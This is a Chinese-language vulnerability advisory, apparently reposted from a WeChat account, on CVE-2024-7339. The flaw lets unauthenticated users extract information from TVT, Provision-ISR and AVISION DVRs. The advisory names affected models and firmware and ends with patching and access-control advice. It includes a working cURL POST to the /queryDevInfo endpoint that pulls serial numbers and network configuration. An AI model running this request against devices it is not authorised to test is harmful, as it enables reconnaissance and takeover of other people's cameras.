一个被标记为 CVE-2024-7339 的安全漏洞被发现存在于多种流行的 DVR(数字视频录像机)设备中,包括 TVT、Provision-ISR、AVISION 等品牌的机型。该漏洞使多达 408,035 台设备面临未经授权的访问和潜在利用的风险。
该漏洞存在于设备的 Web 服务器中,该服务器缺乏访问控制。这允许攻击者远程提取敏感信息,包括硬件和软件版本、序列号和网络配置。利用这些数据,恶意行为者可以发起进一步的攻击,例如:
-
有针对性的入侵:深入了解设备配置可以帮助制定攻击以达到最大影响。
-
设备接管:利用暴露的漏洞来控制 DVR 以用于邪恶目的。
-
数据泄露:可能访问存储在 DVR 上的录音或其他敏感数据。
如果您拥有或管理以下任何 DVR 型号,或使用下面列出的软件版本,则您的设备容易受到攻击:
-
硬件: TVT DVR(TD-2104TS-CL、TD-2108TS-HP)、Provision-ISR DVR(SH-4050A5-5L(MM))、AVISION DVR(AV108T)等。
-
软件版本: 1.3.4.22966B181219.D00.U1(4A21S)、1.3.4.22966B181219.D14.U1(8A41T)、1.3.4.22966B181219.D44.U1(16A82T)、1.3.4.24513B190218.D00.U1(8A21S)、1.3.3.20657B180918.D06.U2(4A41T)、1.3.4.24879B190222.D00.U2(8A21S)
利用过程很简单,只需向易受攻击的端点发送一个简单的 POST 请求。攻击者可以使用以下 cURL 命令来提取设备信息:
curl -X POST "http://<TARGET_IP>/queryDevInfo"
-H "Accept-Language: en-US,en;q=0.9"
-H "Accept-Encoding: gzip, deflate"
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
-H "Upgrade-Insecure-Requests: 1"
-H "Connection: keep-alive"
-H "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS like Mac OS X) AppleWebKit (KHTML, like Gecko) Version Mobile Safari"
-H "Content-Length: 103"
-d '<?xml version="1.0" encoding="utf-8" ?><request version="1.0" systemType="NVMS-9000" clientType="WEB"/>'
该命令向目标 DVR 发送精心设计的 XML 请求,然后目标 DVR 返回有关该设备的敏感信息。
你能做什么?
-
检查更新:立即联系您的 DVR 制造商或供应商,确定是否有可用的补丁或固件更新来解决 CVE-2024-7339。及时应用任何更新。
-
限制访问:实施严格的访问控制和身份验证机制来管理对设备接口的访问。
-
保护您的网络:实施强大的网络安全措施,例如防火墙和强密码,以限制对您的设备的未经授权的访问。
-
监控可疑活动:密切关注您的 DVR 日志,发现任何异常行为,并向您的安全团队或制造商报告任何问题。
原文始发于微信公众号(独眼情报):CVE-2024-7339:DVR 漏洞使超过 400,000 台设备面临黑客攻击
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论